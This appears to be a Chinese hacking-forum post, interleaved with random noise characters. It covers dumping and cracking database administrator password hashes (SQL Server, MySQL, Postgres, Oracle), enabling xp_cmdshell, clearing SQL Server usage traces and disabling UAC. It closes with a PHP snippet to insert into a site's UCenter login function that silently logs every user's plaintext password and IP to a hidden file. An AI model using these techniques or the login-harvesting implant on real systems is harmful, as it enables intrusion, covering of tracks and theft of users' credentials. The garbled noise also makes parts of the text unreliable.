4 s% ^. ?( a# z6 V, G/ m6 N8 |& N P
各种类型数据库抓HASH破解最高权限密码!( p$ b2 i, M, a6 B
1.sql server2000
* S; Y5 h) e0 i. M. y# a6 X8 zSELECT password from master.dbo.sysxlogins where name='sa'3 m r4 ]0 e) E8 F3 ~. M1 M6 {
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
% h' u' b8 n e+ P0 c& b2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
1 |; e3 Y1 F. i( \- C9 g7 r% l* }4 }9 z& u2 A/ r1 }" W
0×0100- constant header
1 c" S! Y. b/ F* U& d! F% o* A34767D5C- salt' B- [2 J9 R1 ^+ D4 g2 D
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash( n2 [1 G6 T( h/ D6 K% E4 N' p
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
! y+ q% l) x: b& |5 B5 ecrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
! ]- b# D" }. d l* h+ uSQL server 2005:-" e8 a& Y$ ^2 I, f+ K
SELECT password_hash FROM sys.sql_logins where name='sa'& c2 ~% M4 E5 z6 q u: W2 p
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
: u9 y! n5 @$ m0×0100- constant header
/ o2 q0 v6 { Z' Z993BF231-salt
) b/ i" v, U+ s/ r* f4 p5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
: o4 u# O: ?# O Z$ Ncrack case sensitive hash in cain, try brute force and dictionary based attacks.9 f' q m4 U0 ]
# L7 o0 @2 j# _9 h0 H( @update:- following bernardo’s comments:-! x4 e$ E* _9 u* N
use function fn_varbintohexstr() to cast password in a hex string.
. O. A/ B% Y; S& Le.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
& F$ b, h6 s( Q% }$ Q5 v; r* }3 c6 @: k- c- |/ Z
MYSQL:-/ T6 z# n/ U& W& x
7 O/ F6 K# m5 u7 r' j- i* _In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
2 X4 G* \2 ?. t' P9 `. F' k5 N! e+ s! p0 N" ~! s
*mysql < 4.1' c8 f2 d, ~% U* k. ] A
: Q1 V$ S! O5 E
mysql> SELECT PASSWORD(‘mypass’);
& P- h! D6 v- ]; _+——————–+
2 @9 h- J0 a( s| PASSWORD(‘mypass’) |
, c. Z& v! T0 ^& _% a0 l/ _3 L+——————–+2 X; k6 ^. a, {8 k' ?* c& a
| 6f8c114b58f2ce9e |
/ [2 q2 R& T: I$ J% e N+——————–+
. Z- b7 {7 J5 v8 `$ t# ~
p0 I' [) P; O2 B! Q# _' e*mysql >=4.10 {2 I' |+ U( c
# a$ t4 t( Y" Imysql> SELECT PASSWORD(‘mypass’);- ]8 r6 D5 d x, B, ]
+——————————————-+' a0 V1 p+ ]& @3 k& z4 c9 q; b+ d$ ~
| PASSWORD(‘mypass’) |
% D8 o3 T$ P, o# i8 ^+——————————————-+
/ u2 Z2 [" k- e9 X| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |3 d- O5 [* ~1 X' N' A, \+ r$ ?
+——————————————-+
' z2 x, N) s( f, O% z
) U/ a" P' e2 C8 h% ~- J ~2 w$ eSelect user, password from mysql.user
$ Z; w: w& Y; {+ S! u% @The hashes can be cracked in ‘cain and abel’- y" I2 _. H& E$ u. g
, p% J( a, |$ M7 Z2 K# tPostgres:-. M+ V |/ o2 a1 d
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)% T8 D* @9 {9 T
select usename, passwd from pg_shadow;- }& u: K! Y9 b0 ~
usename | passwd5 K+ d/ T O9 M2 ?
——————+————————————-
& X! m' X' U+ O) H1 k5 ttestuser | md5fabb6d7172aadfda4753bf0507ed4396" \, e y3 }: Y4 L
use mdcrack to crack these hashes:-
, q: T! `/ x3 i& r+ m6 G) j2 [$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
: V4 d( j- c9 z- ~$ ?* L& }4 X M8 `! D. R
Oracle:-& f4 v' ?8 Y# G9 u; m
select name, password, spare4 from sys.user$
9 }% B) U+ Q' @7 D% V% I" Chashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g K4 ?" w* r5 G9 R
More on Oracle later, i am a bit bored….
" w1 F4 B* V, w' Q! I! w% V" t
2 Y3 e" F0 G* V: `# G) c( r( ^9 E7 R, q* O" d/ F P+ w0 V
在sql server2005/2008中开启xp_cmdshell7 H- c3 N1 Z, y& P& J1 K& O* ^4 m
-- To allow advanced options to be changed.& q' z8 G4 a N' k
EXEC sp_configure 'show advanced options', 1
y& @' a: ?$ H5 tGO
4 J. V+ D0 H% |* Y+ T+ z-- To update the currently configured value for advanced options., V: G: o& t) h- b. \' t3 t
RECONFIGURE
, x1 r/ U3 @/ G5 U9 wGO+ O9 @) d& u) }+ ~) c
-- To enable the feature.% B' I. o+ @3 G( @ l! @: v
EXEC sp_configure 'xp_cmdshell', 14 u0 ~: J1 U+ X% v7 s
GO
. z4 R* }+ L" A7 U8 Q-- To update the currently configured value for this feature.& o: E2 N5 N! N
RECONFIGURE2 N5 u0 z7 A6 w; m* H; Z3 @
GO
/ W+ Y; j8 T* X8 V! n' `SQL 2008 server日志清除,在清楚前一定要备份。
: w5 t5 n( d: x8 I1 Y, B! D# B, G如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
: l% K' V; @3 uX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
$ l' k! Y; i2 w! D+ }( s( Z. h4 }0 f8 ^* C+ G" J
对于SQL Server 2008以前的版本:
' i! P" ]2 a) Y ySQL Server 2005:6 \. C) S3 C; i- Z
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
2 t0 Z# _% S9 q, FSQL Server 2000:1 D3 N3 f0 q' q9 j; d
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
: V* z0 t. V8 y( r& p. T/ f. m1 C- t- z
本帖最后由 simeon 于 2013-1-3 09:51 编辑/ N @' A; O4 ?1 Z. ]% W
& i# t/ p! ^; ~6 F+ h% m# U; d# q
4 ]1 s; a8 W( Lwindows 2008 文件权限修改
$ S5 p% s0 A+ ?" m6 {* y8 m6 i1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
7 B5 i. f# H1 b; I7 Q2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad982 u$ K2 F5 b9 B. h: {
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
; P7 v6 i0 Z) p! P& g7 M
$ I7 n5 Z; t; |4 X% ]( K: b0 tWindows Registry Editor Version 5.00$ T" k+ t* z6 q6 m
[HKEY_CLASSES_ROOT\*\shell\runas]
) R# r( K. O8 \! B' ~@="管理员取得所有权"9 W$ d% z. B3 \, U
"NoWorkingDirectory"=""8 P# T: p9 j5 k2 Z8 s2 K/ s
[HKEY_CLASSES_ROOT\*\shell\runas\command]
! U% U T" z* r3 _@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
( {: ? ?+ ?/ o C% Y- r0 b"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"& U$ q6 G) I/ ?9 M& q
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
% F% Z4 M. o4 u% k) H; ^% W+ c2 x@="管理员取得所有权"4 U4 D% x! Q" G" j1 E
"NoWorkingDirectory"=""
& {* O% o# e9 O4 K! v, F( }5 x[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
- U9 O3 i' b" k. y7 k- @/ p" L@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
0 z( P' [1 O. y9 }/ n5 _"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
' i; i% k% Q: v8 }+ F9 K8 K3 `$ _- Y5 r' i) D" Y& d v- e# ?# m
[HKEY_CLASSES_ROOT\Directory\shell\runas]: {: I I4 ]. i% }- d& c. p9 t: ~
@="管理员取得所有权"
( V6 Q: F. a7 k' q" z"NoWorkingDirectory"=""
! q( f0 z7 c5 A' d9 R- Y. S: s7 q[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
) I5 }. V2 w' f8 U4 _@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"; t& N% y; o7 H; {. N, j: ~: T
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
; A: w' x6 z$ P/ I
+ m# `- I, o$ z8 a1 q4 A" y0 _
, j. \8 f$ _6 y2 J( k8 W8 hwin7右键“管理员取得所有权”.reg导入
4 p& b6 ^4 @1 R' V: e1 h0 v' O二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
* |" q; B% r0 s) e1、C:\Windows这个路径的“notepad.exe”不需要替换0 a; }2 S0 J; J* q7 I7 S f
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
; r: V, U! u: A- f6 B3、四个“notepad.exe.mui”不要管
: R! o5 Q. K6 u% |2 w1 e4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
! {+ N% K' a5 NC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”/ \: t8 W+ D0 O V2 S/ E/ j
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
" v) b, A& b' R替换完之后回到桌面,新建一个txt文档打开看看是不是变了。5 i0 z5 Q; Z6 [6 Z9 T2 j9 W: U. \9 _% @
windows 2008中关闭安全策略: : K8 F: y9 R' N
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
$ I4 N, m5 o$ x$ K修改uc_client目录下的client.php 在
1 ^4 C) _) p" X9 z4 G! H- Qfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {& Y: g+ A( t9 X6 I6 u) s. [' `
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
" [2 ^% B/ P1 h7 x4 k; Q# h, F- q你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw) w% J3 u& F) b+ e- R
if(getenv('HTTP_CLIENT_IP')) {! @) s7 v2 I4 W1 f
$onlineip = getenv('HTTP_CLIENT_IP');
' C- @) |8 c% Q: k! T} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
4 O- ^3 z, q" X% P$onlineip = getenv('HTTP_X_FORWARDED_FOR');' D! ]$ G! K+ }8 b# E! S' K
} elseif(getenv('REMOTE_ADDR')) {& n1 G, F" \! W$ ~, E, r
$onlineip = getenv('REMOTE_ADDR');- I$ X o+ c$ S2 \, W- [
} else {" k& s2 r$ r# Q0 D! b: _
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
0 }8 T! A5 P ?}
9 ? f4 E) l3 W& Y. R3 H $showtime=date("Y-m-d H:i:s");
) g) P$ R6 s$ D7 L# u $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
4 n- B( h; Y, K/ X0 U0 T# s+ r7 p $handle=fopen('./data/cache/csslog.php','a+');
, {8 W3 N! h6 V$ P. p/ x $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对